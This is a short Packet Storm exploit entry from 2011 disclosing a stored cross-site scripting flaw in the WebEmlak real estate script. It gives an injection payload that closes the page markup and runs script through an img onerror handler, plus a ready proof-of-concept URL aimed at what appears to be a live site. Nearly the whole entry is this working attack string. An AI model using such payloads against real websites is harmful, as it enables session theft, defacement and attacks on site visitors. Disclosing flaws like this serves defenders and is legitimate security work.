WebEmlak Real Estate Cross Site Scripting

2011-09-08T00:00:00
ID PACKETSTORM:104906
Type packetstorm
Reporter Eyup CELIK
Modified 2011-09-08T00:00:00

Description

                                        
                                            `# Exploit Title: WebEmlak Real Estate Script Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
Cross Site Scripting can be done using the URL input  
  
Vulnerable Page:  
index.php  
  
  
Example:  
index.php/<XSS Code>  
  
  
Exploit:  
index.php/"/></a></><img src=1.gif onerror=alert(1)>  
  
  
POC:  
http://www.webemlakofisi.com/portal2/index.php/%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert%281%29%3E  
`